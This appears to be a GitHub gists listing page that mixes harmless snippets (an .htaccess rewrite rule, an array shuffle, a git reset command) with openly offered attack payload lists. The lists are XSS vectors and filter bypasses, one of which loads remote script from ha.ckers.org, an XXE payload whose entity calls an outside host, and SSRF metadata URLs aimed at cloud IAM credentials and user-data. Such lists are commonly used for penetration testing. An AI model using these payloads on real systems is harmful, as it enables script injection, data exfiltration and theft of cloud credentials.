ThomasOrlita’s gists

conorbuck / angle-between-points.js

Created May 5, 2012 22:51

JavaScript: Find the angle between two points

rayfranco / APACHE: .htaccess pushstate

Created July 30, 2012 23:04

.htaccess for HTML5 Pushstate support

	<ifModule mod_rewrite.c>
	Options +FollowSymLinks
	IndexIgnore /
	RewriteEngine On
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule (.*) index.html
	</ifModule>

JohannesHoppe / 666_lines_of_XSS_vectors.html

Created May 20, 2013 13:38

666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L

	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>

xem / LICENSE.txt

Last active June 16, 2021 00:05 — forked from 140bytes/LICENSE.txt

Challenge: Executing more than 140 JS characters in a tweet!

	DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
	Version 2, December 2004

	Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>

	Everyone is permitted to copy and distribute verbatim or modified
	copies of this license document, and changing it is allowed as long
	as the name is changed.

	DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

staaldraad / XXE_payloads

Last active May 5, 2025 16:10

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

rvrsh3ll / xxsfilterbypass.lst

Last active April 18, 2025 16:31

XSS Filter Bypass List

	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>

BuffaloWill / cloud_metadata.txt

Last active May 6, 2025 04:20

Cloud Metadata Dictionary useful for SSRF Testing

	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

guilhermepontes / shuffle.js

Last active October 29, 2023 01:41

Shuffle Array - JavaScript ES2015, ES6

	// original gist
	const shuffleArray = arr => arr.sort(() => Math.random() - 0.5);

	// fully random by @BetonMAN
	const shuffleArray = arr => arr
	.map(a => [Math.random(), a])
	.sort((a, b) => a[0] - b[0])
	.map(a => a[1]);

	shuffleArray([1, 2, 3]) //[3, 1, 2]

iffy / .gitignore

Last active May 19, 2025 13:56

Example using electron-updater with `generic` provider.

wilsonsilva / undo_last_commit.sh

Created June 21, 2017 15:47

Undo last commit but keep changes

	# https://stackoverflow.com/a/44672195/3013522
	git reset --soft HEAD~1

Thomas Orlita ThomasOrlita